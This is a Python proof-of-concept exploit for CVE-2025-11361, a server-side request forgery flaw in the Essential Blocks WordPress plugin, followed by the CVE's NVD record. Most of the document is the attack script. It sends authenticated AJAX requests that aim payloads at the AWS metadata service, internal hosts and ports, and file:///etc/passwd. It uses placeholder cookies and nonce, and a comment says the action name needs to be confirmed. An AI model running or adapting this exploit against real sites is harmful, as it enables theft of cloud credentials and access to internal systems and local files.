CVE-2025-11361

# CVE-2025-11361 PoC - Essential Blocks Plugin SSRF # Vulnerable endpoint: /wp-admin/admin-ajax.php # Vulnerable function: eb_save_ai_generated_image # File: includes/Admin/Admin.php (line 865) import requests # Target WordPress site URL TARGET_URL = "http://target-wordpress-site.com" # Authenticated session cookies (Author-level access required) COOKIES = { "wordpress_logged_in_[hash]": "your_auth_cookie", "wordpress_sec_[hash]": "your_sec_cookie" } # SSRF payloads to exploit the eb_save_ai_generated_image function ssrf_payloads = [ # Access AWS metadata service "http://169.254.169.254/latest/meta-data/", # Access internal localhost services "http://127.0.0.1:8080/admin", # Access internal network resources "http://192.168.1.1/", # File protocol to read local files "file:///etc/passwd", # Internal database service "http://internal-db-service:3306/" ] def exploit_ssrf(target_url, cookies, payload_url): """ Exploit SSRF via eb_save_ai_generated_image function The function processes AI-generated image URLs without proper validation """ endpoint = f"{target_url}/wp-admin/admin-ajax.php" # WordPress AJAX action for the vulnerable function data = { "action": "eb_save_ai_generated_image", "image_url": payload_url, "nonce": "valid_nonce_value" } headers = { "X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded" } response = requests.post( endpoint, data=data, cookies=cookies, headers=headers ) print(f"[*] Payload: {payload_url}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text[:500]}") return response # Execute SSRF attack with different payloads for payload in ssrf_payloads: print("\n" + "="*60) exploit_ssrf(TARGET_URL, COOKIES, payload) print("="*60) # Note: The actual AJAX action name and nonce should be obtained # by analyzing the plugin source code at: # https://plugins.trac.wordpress.org/browser/essential-blocks/tags/5.7.0/includes/Admin/Admin.php#L865

{"cve": {"id": "CVE-2025-11361", "sourceIdentifier": "[email protected]", "published": "2025-10-18T05:15:33.607", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gutenberg Essential Blocks – Page Builder for Gutenberg Blocks & Patterns plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.7.1 via the eb_save_ai_generated_image function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/essential-blocks/tags/5.7.0/includes/Admin/Admin.php#L865", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-11361/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d4b06b93-6b15-4b1f-bdd9-080618591bdc?source=cve", "source": "[email protected]"}]}}